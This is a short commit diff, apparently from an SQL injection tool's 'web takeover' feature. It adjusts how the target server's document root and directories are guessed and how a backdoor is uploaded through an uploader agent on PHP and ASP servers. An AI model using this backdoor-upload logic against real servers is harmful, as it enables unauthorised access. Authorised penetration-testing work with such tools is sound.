some changes regarding web takeover

This commit is contained in:
Miroslav Stampar 2010-02-09 14:27:41 +00:00
parent 542b01993e
commit 00a23ace9a
2 changed files with 9 additions and 20 deletions

View File

@ -232,6 +232,8 @@ def getDocRoot():
if kb.absFilePaths:
for absFilePath in kb.absFilePaths:
if directoryPath(absFilePath) == '/':
continue
absFilePath = normalizePath(absFilePath)
absFilePathWin = None
@ -271,20 +273,22 @@ def getDirs():
directories = set()
if kb.os == "Windows":
defaultDir = "C:/Inetpub/wwwroot/test/"
defaultDir = "C:/Inetpub/wwwroot/"
else:
defaultDir = "/var/www/test/"
defaultDir = "/var/www/"
if kb.absFilePaths:
infoMsg = "retrieved web server full paths: "
infoMsg += "'%s'" % ", ".join(path for path in kb.absFilePaths)
logger.info(infoMsg)
for absFilePath in kb.absFilePaths:
if absFilePath:
directory = directoryPath(absFilePath)
if isWindowsPath(directory):
directory = directory.replace('\\', '/')
if directory == '/':
continue
directories.add(directory)
else:
warnMsg = "unable to retrieve any web server path"

View File

@ -86,14 +86,14 @@ class Web:
return retVal
def __webFileStreamUpload(self, stream, destFileName, directory):
if self.webApi == "php":
if self.webApi in ("php", "asp"):
multipartParams = {
"upload": "1",
"file": stream,
"uploadDir": directory,
}
page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams)
page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = "unable to upload the backdoor through "
@ -103,21 +103,6 @@ class Web:
else:
return True
elif self.webApi == "asp":
backdoorRemotePath = "%s/%s" % (directory, destFileName)
backdoorRemotePath = normalizePath(backdoorRemotePath)
backdoorContent = stream.read()
postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
page, _ = Request.getPage(url=self.webUploaderUrl, direct=True, post=postStr)
if "permission denied" in page.lower():
warnMsg = "unable to upload the backdoor through "
warnMsg += "the uploader agent on '%s'" % directory
logger.warn(warnMsg)
return False
else:
return True
elif self.webApi == "jsp":
return False